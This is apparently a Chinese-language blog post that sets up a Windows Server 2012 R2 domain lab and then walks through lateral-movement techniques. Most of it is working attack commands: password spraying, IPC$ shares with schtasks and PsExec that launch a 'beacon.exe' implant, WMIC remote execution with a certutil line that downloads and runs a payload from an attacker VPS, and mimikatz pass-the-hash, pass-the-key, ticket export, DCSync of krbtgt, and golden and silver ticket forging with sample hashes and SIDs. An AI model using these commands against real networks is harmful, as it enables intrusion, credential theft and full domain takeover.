原创 | 域环境搭建以及域内横向姿势总结
点击蓝字
关注我们
安装winsever 2012R2
略过安装虚拟机的步骤
设置虚拟网卡vmnet1为仅主机模式,手动设定ip地址为192.168.10.10
配置域环境
配置域控制器选项
配置DNS选项,直接下一步,直至安装结束重启服务器
密码长度要符合要求,域用户新建成功。
配置域内主机
加入域成功重启服务器,登录用户san
攻击机win10
首先拥有R2-2的权限普通用户,查询服务器系统
根据systeminfo,查询到存在域,且双网卡
抓取密码凭证
获取到user1用户的明文密码以及hash值,内网扫描
横向渗透
根据拿到的用户名和密码进行密码喷洒,常用的工具比较多Crack系列工具或者cs插件都可以实现,或者根据密码枚举用户
net use \192.168.10.13\c$ "1qaz@WSX" /user:user2
net use
shell schtasks.exe /create /s 192.168.10.13 /sc once /st 20:03 /tn test2 /tr c:\beacon.exe /ru system /f /u workgroup\administrator /p "xxxx"
注意事项
这里需要目标机器的管理员用户权限才可以,或者域用户存在域管理员组,这里的巧合是因为搭建环境的时候administrator的口令和域用户user1,user2的口令相同,同样密码喷洒是可以爆破出来的。
使用条件
无明文密码 内网或者域内存在主机使用想用的密码 建立ipc隧道的用户为目标主机的管理用用户或者用户属于管理员用户组内
PsExec.exe,首先创建ipc$隧道,使用该应用进行横向net use \\xxxxxxx\c$ "password" /u:administratorcopy beacon.exe \\xxxxxxx\c$psexec -accepteula \\xxxxxxx -h -d c:\beacon.exe目标主机上线
优点
psexec.exe在杀软白名单,一般不会拦截,且可以直接提权至system权限。
3.ipc管道+smbexec横向
4.wmi横向
条件:开启135端口管理员账号和密码或者账号所属管理员用户组shell wmic.exe /node:192.168.10.11 /user:<目标用户> /password:<目标密码> process call create "cmd.exe /c whoami > c:\1.txt"
shell dir \192.168.10.11\c$shell type \\192.168.10.11\c$\1.txt机器出网
shell wmic /node:192.168.10.11 /user:<目标用户> /password:<目标密码> process call create "certutil.exe -urlcache -split -f http://vps:port/a.exe c:\windows\temp\certutil.exe"c:\windows\temp\certutil.exeshell wmic /node:192.168.10.11 /user:<目标用户> /password:<目标密码> process call create "cmd.exe /c c:\windows\temp\certutil.exe"机器不出网
条件:端口139,445 目标主机的用户名以及密码shell net use \\目标主机ip\c$ "<密码>" /u:<用户名>shell net use #查看目标链接状态shell copy beacon.exe \\目标主机ip\c$\beacon.exeshell wmic /node:目标主机ip /user:<用户名> /password:<密码> process call create "cmd.exe /c c:\beacon.exe" #目标主机上线条件:用户必须处于已登录状态privilegesekurlsa::pth /user:<用户名> /domain:<域名> /ntlm:161cff084477fe596a5db81874498a24dir \\横向目标IP\c$6.pass the key(ptk)
用户需要在横向目标的管理员用户组内,否则权限不足,拒绝访问实际上这里未安装补丁KB2871997依旧可以实现ptkprivilege::debug sekurlsa::ekeys
无补丁的情况下无法获取到aes256的key值,安装补丁KB2871997,查看之后发现该补丁不支持win10。
privilege::debugsekurlsa::ekeyssekurlsa::pth /user:<用户名> /domain:<域名> /aes256:363776e0362734fa87ba0077bed16794d1bcd3800719d23243d58cb1d3b95168dir \\主机名\c$条件用户需要在横向目标的管理员用户组内,否则权限不足,拒绝访问privilege::debugsekurlsa::tickets /exportkerberos::ptt "票据文件" //kerberos::ptt "[0;9414b]-2-0-40e10000-Administrator@krbtgt-<域名>.COM.kirbi"Kerberos::purge //清除票据域控主机
lsadump::dcsync /domain:starseaseclab.com /user:krbtgt
跳板机执行
klist //查看票据文件kerberos::golden /user:administrator /domain:<域名> /sid:S-1-5-21-1719736279-3906200060-616816393 /krbtgt:5e31f755b33b621bede0946b044908e4 /ptt //票据直接注入内存klist purge //清楚内存票据白银票据
使用条件:域管sid
kerberos::golden:使用minikatz中票据的功能/domain:指定域名/sid:Client端查询的sid号,在域控中查询也可以,都是一样的/target:主域控中的计算机全名/rc4:在域控中抓取的hash(NTLM)/service:需要伪造的服务(cifs只是其中的一种服务,可伪造的服务很多)/user:需要伪造的用户名(可自定义)/ppt:伪造了以后直接写入到内存中命令
获取信息域sid:S-1-5-21-1719736279-3906200060-616816393ntlm:5e31f755b33b621bede0946b044908e4
制作一张 cifs 服务的白银票据kerberos::golden /domain:<域名> /sid:S-1-5-21-1719736279-3906200060-616816393 /target:administrator.<域名> /service:cifs /rc4:5e31f755b33b621bede0946b044908e4 /user:administrator /ptt
dir \\win-dc\c$ ptt和ptk的横向方式仅针对于域内
基本上的横向姿势应该就是这些了,基本上原理都差不多,实战的话肯定根据需求使用,金票在实战中确实一般利用不到,当然也还有其他横向工具,姿势基本上就是这样了。
往期推荐